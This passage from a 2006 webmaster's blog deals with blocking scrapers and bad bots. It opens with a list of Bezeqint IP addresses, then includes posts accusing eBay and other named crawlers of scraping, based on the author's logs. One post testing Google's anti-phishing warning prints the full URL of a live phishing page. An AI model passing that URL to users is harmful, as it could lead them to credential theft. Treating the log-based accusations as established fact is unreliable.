84.110.245.154 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.245.247 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.246.10 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.246.223 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.246.226 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.246.41 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.247.126 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.247.28 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.248.165 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.248.226 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.249.117 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.249.201 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.249.217 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.249.218 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.120 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.131 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.155 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.189 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.213 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.68 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.71 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.250.87 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.251.112 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.251.141 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.251.150 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.251.80 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.252.10 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.252.133 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.252.165 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.252.178 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.252.44 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.253.151 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.253.186 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.253.83 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.254.213 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.254.237 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.254.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.254.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.255.214 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.255.248 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.255.55 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.255.81 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
84.110.255.84 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Don't know what in the hell is going on with Bezeqint but I think I'm going to start tracking to see if I'm getting any legitimate traffic from there and if not, I'll just block their entire network as nothing good seems to be coming from them.

Monday, November 20, 2006

Abotcalypse Now

My goodness, I must be making those people that run bad bots afraid because the number of blog and comment posts decrying how I'm about to destroy the web are cropping up almost daily since my presentation at PubCon.

Assuming that the people making these posts are the same people causing the problems that drive me to the "extremes of mouth-frothing, profanity, and severe bot-blocking" you might think that they would take note that they are responsible for the bad behavior that might stop the next Google from being born.

Unfortunately I'm the "arrogant twit" as I'm so self-obsessed with my mission from hell that I'm oblivious to how my technology will wreck the net.

Riiiiiiiiiiiight.

You people running scrapers need to take stock of the damage you'll ultimately cause and stop trying to pass the blame my way.

I'm just a supplier of weapons in the war on bad bots so surrender now and save the web.

Nah, that would be too easy as they don't think they do anything wrong.

In summary, not being someone that wants to disappoint the author of that amusing post, I laughed so hard reading it because it was just too fucking funny, there's your profanity.

Enjoy.

Saturday, November 18, 2006

Good Scrapers, Bad Scrapers and Tinkerers, OH MY!

Someone posting on Freedom to Tinker as Neo said a similar thing to Greg Yardley's post that my bot blocking endeavors are going to stop tinkerers and end innovation on the web which is patently untrue.

The only thing my bot blocker is going to do is allow any webmasters, even non-technical neophytes, to have easy access to the tools that allow them to monitor and control access to their sites that is both easy to understand and administer. No more cryptic crap. The software will show them what's accessing their site so they can make informed decisions about what should crawl or what shouldn't crawl. That's what it's all about, knowledge, as knowledge is power and gives the webmaster the upper hand.

I'm not the only one blocking everything either as Brett Tabke of WebmasterWorld blocked everything from crawling for a while just to see what was bouncing off his firewall. What Brett decided to do was just require logins from people coming from bad internet neighborhoods. Since most websites don't have logins and subscriptions, my solution was to use captchas when bad behavior happens.

Yes, I'll admit I'm on a tear and block everything under the sun but I have a real purpose in my madness which is feeding bread crumbs to the rest of the creepy crawlers hitting my site so I know who they are, where they came from and where the content appears when it's indexed by search engines.

However, I don't intend on enforcing my particular brand of blocking on everyone that decides to use my bot blocker as one size doesn't fit all. The software has lots of options that the webmaster can set, and assuming the webmaster checks his control panel now and then, shows the webmaster what new things are on the web and allows them to grant access or be denied.

I don't foresee my bot blocker causing Neo's or Yardley's apocalyptic view of the web whatsoever but I do foresee the following changes:

  • New bots and people tinkering might just have to ask permission first to the network of bot blockers to get access, not a big deal and easily done.
  • Sloppy bots will go away or be fixed when they get stopped doing dumb things.
  • User agents will be unique per site or software, no more Java/1.5.0_03 so they can either learn how to set the UA or stay off the net.
  • Good scrapers that scrape for directories, that actually provide real links to sites, will need to identify themselves or go away.
  • Bad scrapers will be in serious jeopardy as the scraping noose closes.
Therefore, people that play by the rules, honor robots.txt and actually use a real user agent and supply a web page people review to see what they are doing and why they should be allowed to crawl will have no problem.

It's just the bottom feeding scrapers and spammers that will be in serious trouble and we may see botnets emerge to do the bidding of the nastiest of the crawlers.

OOOPS!

Too late, botnets already exist and other groups are actively fighting the botnets.

So what am I missing that bot blocking technology will cause?

Oh yes, the return of MANNERS, COURTESY and RESPECT FOR COPYRIGHT which means asking permission, being OPT-IN, not just taking what you want regardless of the webmasters's wishes.

When you ask to crawl my site it's a business arrangement, you want to build a business and ask MY PERMISSION to be included in your business.

This is how it works in the real world.

If you want to do business with someone you have to ask first

It would appear that many think that respect and courtesy is something that's not part of the Internet and the entitlement to content just because it's on a PUBLIC NETWORK is flat wrong.

Walmart is technically a public place, anyone can just walk in the door, and if you walked into Walmart and do what most scrapers do on the web they would call the cops and haul your ass off to jail. Before you respond that Walmart is a private company, even the Public Library frowns on people doing what scrapers do and they have signs posted above copying machines warning you about copyright and you can only copy small quantities for personal use only.

I'm just giving webmasters the same control Walmart has:

WE HAVE THE RIGHT TO NOT SERVE ANYONE.

NO SHIRT. NO SHOES. NO SERVICE.

Pretty simple.

The webmasters will be able to control their site as much as technology allows. If we get to the point that Neo suggests where every visitor has to enter a captcha before they can access any website, I suspect some legislation will possibly occur that will make crawling without permission an offense and the Australians are already working on legislation which is flawed, but they are heading in that direction.

I'm just making the tool, not telling people how to implement it.

The choice is up to the internet, webmasters and politicians how this all plays out, not me.

Google's Anti-Phish ROCKS!

After reading all of the whiners and complainers going on and on about how anti-phish in browsers was going to give people a false sense of security I decided to put it to the test today when a phishing email landed in my Inbox.

Within minutes of the arrival of the phishing email, I enabled the Google anti-phish in FireFox 2.0 and went to the site linked in the email:

http://g-lec.com/data/cont/news/sicherung/einfach_millionaer1/wells/
The very minute the screen loaded Google popped up an alert:



Here's the page without the Google alert covering it:



I'll try the anti-phish a few more times as the opportunity arises, but this first test was impressive. As soon as I get around to installing IE 7 then I'll test their anti-phish as well.

Way to go Google!

You get a nice well deserved pat on the back for this one!

eBay is Scraping?

Caught this story on WebmasterWorld about eBay scraping and sure enough found evidence of the same thing in my site.

The first IP is definitely a stealth bot, it's blocked, yet keeps asking for pages over the last couple of months.

216.113.181.67 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461; .NET CLR 1.1.4322)"
This IP address used a banned user agent so it would never be allowed to crawl in the first place yet still asked for a couple of page names it already knew about, weird.
216.113.168.141 "Java/1.5.0_09"
Here's eBay's info so you can block whatever the hell they're doing:
OrgName: eBay, Inc
OrgID: EBAY
Address: 2145 Hamilton Ave
City: San Jose
StateProv: CA
PostalCode: 95008
Country: US

NetRange: 216.113.160.0 - 216.113.191.255
CIDR: 216.113.160.0/19
What will they do with the information they collect, sell it to the highest bidding scraper?

Stealing T-H-U-N-D-E-R-S-T-O-N-E's Thunder

Here's another LayeredTech scraper busted for your amusement.

They call themselves a search engine and a web crawler, but when I can't find any information that ties the crawler back to the source without jumping through extraordinary means, such as feeding them bread crumbs to chase through the internet, I call them scrapers.

Here's the scraper or web crawler as they call it:

72.232.181.210 "Mozilla/2.0 (compatible; T-H-U-N-D-E-R-S-T-O-N-E)"
Here's where the scrapings end up:
http://www.buyersindex.com/
Apparently this thing is probably the Webinator by Thunderstone Software but it's hard to tell as the user agent has no link to any crawler information and a quick casual review of either website turned up nothing about the crawler.

It's not exactly like they're hiding or anything but it isn't completely above board either by not divulging who's crawling and why.


Will Google Really Banish Scrapers?

Many people at PubCon, including some major companies, were telling me their tales of scraper horror. All the stories were similar about being endlessly abused and they were having trouble getting the problem under control or just gave up in frustration. Several people even asked the search engines what they were going to do about scrapers in the Q&A of some PubCon sessions and got the old "we're working on it" response which I think is half-hearted.

When you consider that AdSense technology fuels most scraper sites it's obvious Google could simply look at any AdSense account serving up ads from a multitude of locations which is usually a clue there's something rotten happening. Not that everyone with AdSense on multiple domains is bad, but when you see a single AdSense account used on thousands of locations, you know there's a good chance it's all crap. However, Google probably makes way too much money from scrapers just to eliminate them altogether. What's more than likely to happen is Google might drop scrapers from the Google index but leave their AdSense accounts intact so that the revenue stream continues from these sites being found in Yahoo and MSN.

Perhaps we can hope Yahoo and MSN figure out how to detect and eliminate scrapers first and put our friends at Google between a rock and a hard spot with the dilemma of scrapers vs. AdSense revenue. Either Google would have to clean up their search results to make the users happy or leave the scrapers in to make the stockholders and bean counters happy, which could backfire either way. Needless to say, I don't see scrapers going away any time soon because the financial incentives to keep them are just too great.

Meanwhile, I recommend reporting scrapers on Google's Report a Spam Result page and see if Google is serious about getting rid of scrapers when found.

Sunday, November 12, 2006

Billed as a RoadBlock to the Semantic Web

Got a sudden burst of traffic from Greg Yardley's site today and noticed the topic was about "The coming semantic web roadblock" which I find amusing as I loathe the onslaught of data miners that hit my site and block their asses automatically on a daily basis.

Greg raised a couple of issues that I've heard a few times from other people that my technology will block everything and prevent new search technology from becoming established, and potentially block things that are currently providing value for your site and that's not entirely true nor my intent at all.

Remember, my primary goal is to make the websites using my product OPT-IN or whitelist things that want access instead of OPT-OUT or blacklist which doesn't work at all.

When you first install this bot blocking tool, it's in a PREVIEW mode by default which means you can see what it would be blocking but no action is being taken. It's completely passive when it's in PREVIEW mode and doesn't even challenge possible stealth scrapers, so it may not know if they're human or not but will take a guess. That means you can observe what's going on with your website for days or even weeks and then authorize anything that's providing value before turning the product LIVE and blocking the rest.

Now the next thing that's important to know is that the product records and reports new user agents that appear, so you will see in REAL TIME when something new, never before seen, hits the site. Remember, since we're OPT-IN, we haven't decided if these new things are good or bad yet so the first time they visit the site they'll get bounced off robots.txt assuming they honor it or not. The next time they visit, if the webmaster decided to let them in, they'll be allowed to crawl without issue.

To summarize, it's up to the decision of each webmaster whether or not the Semantic Web will become a reality or not, not me, my tool or service.

I prefer to think of Web 3.0 as the Democratic Web so if the majority decides to vote the Semantic Web out, who am I to argue?